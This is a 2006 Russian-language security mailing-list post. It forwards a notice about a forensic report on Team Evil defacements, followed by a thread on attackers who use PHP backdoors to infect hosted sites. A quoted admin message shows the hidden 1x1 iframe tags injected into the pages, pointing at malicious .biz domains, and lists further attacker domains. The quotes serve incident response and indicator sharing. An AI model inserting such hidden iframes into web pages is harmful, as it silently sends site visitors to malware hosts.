Наверное, Михаил имел в виду этот мой постинг
----------
> -----Original Message-----
> From: SecuriTeam [mailto:support@xxxxxxxxxxxxxx]
> Sent: Monday, November 13, 2006 6:56 PM
> To: html-list@xxxxxxxxxxxxxx
> Subject: [NEWS] Team Evil - Incident #2
>
>
> Team Evil - Incident #2
>
>
>
> A followup document on Team Evil's methodology to attack and
> deface sites as well as how such attacks can be investigated,
> has been released today by Beyond Security's beSIRT.
>
>
> Earlier this year, Beyond Security's beSIRT released an
> incident response forensic analysis of a defacement attack by
> Team Evil [Team Evil Incident (Cyber-terrorism defacement
> analysis and response)
> <http://blogs.securiteam.com/index.php/archives/510> ]. The
> PDF itself can be found here:
>
> http://www.beyondsecurity.com/besirt/advisories/team-evil-inci
> dent.pdf
>
> A follow up is being released today, on a second incident.
> Following what Team Evil did, their methodology and how it
> changed since the first document was released.
>
> The aim of this document is more to show how such analysis is
> done, on an educational note. The PDF can be found here:
>
> http://beyondsecurity.com/besirt/advisories/teamevil-incident2.pdf
>
> We hope you find this useful.
>
>
> Additional Information:
>
> -----Original Message-----
> From: 3APA3A [mailto:3APA3A@xxxxxxxxxxxxxxxx]
> Sent: Wednesday, December 20, 2006 12:36 PM
> To: Michael Tokarev
> Cc: security-alerts@xxxxxxxxxxxxxx
> Subject: Re: [security-alerts] PHP trojan?
>
> Dear Michael Tokarev,
>
> Ну вообще-то факт, что кто-то через php shell на одном
> сайте может
> что-то сделать с другими сайтами указывает на
> существенную кривизну
> чьих-то рук.
>
> Троянцев/вирусов меняющих все HTML/ASP/PHP файлы, которые
> они смогли
> найти достаточно много. Но для этого надо, чтобы его через
> IE загрузили
> с той машины, где эти файлы лежат.
>
> Еще некоторое время назад был червяк, ползающий по дырявым
> phpBB. Это
> было давно и неактуально.
>
> В данном случае речь явно идет об атаке либо на сам хостинг
> либо на его
> движок.
>
> --Wednesday, December 20, 2006, 12:13:44 PM, you wrote to
> security-alerts@xxxxxxxxxxxxxx:
>
> MT> Я недавно где-то видел информацию о трояне, эксплуатирующем
> MT> php-сайты, но не могу найти. Почему-то мне кажется, что она
> MT> проходила в этом списке...
>
> MT> Короче:
>
> MT> <quote>
> MT> On another note, we've been dealing with some crazy
> hakcers on many of our
> MT> servers. They come in via php backdoors or insecure php
> scripts and infect
> MT> all sites with something like
> MT> <iframe src='http://dgfjhewfndsbfsdvf.biz/adv/167/new.php' width=1
> MT> height=1></iframe><iframe
> MT> src='http://dgfjhewfndsbfsdvf.biz/adv/new.php?adv=167' width=1
> MT> height=1></iframe>
>
> MT> The domain has changed a few times in the last few
> months, but it always
> MT> ends in .biz and is in that format. Its been a real
> struggle with these
> MT> guys, many of our clients are getting hacked.
>
> MT> Some of the other domains they've used are
> MT> wsfgfdgrtyhgfd.net
> MT> uniqcount.net
> MT> megacount.net
>
> MT> any help is greatly appreciated, i've been up all night
> fighting it
> MT> Thanks.
> MT> </quote>
>
> MT> Тут два момента.
> MT> 1) собственно троян, и
> MT> 2) эти домены ведут в Москву.
> MT> Кто-то может что-то сказать?
>
> MT> /mjt
>
>
>
> --
> ~/ZARAZA
> Всегда будем рады послушать ваше чириканье (Твен)
>
>
>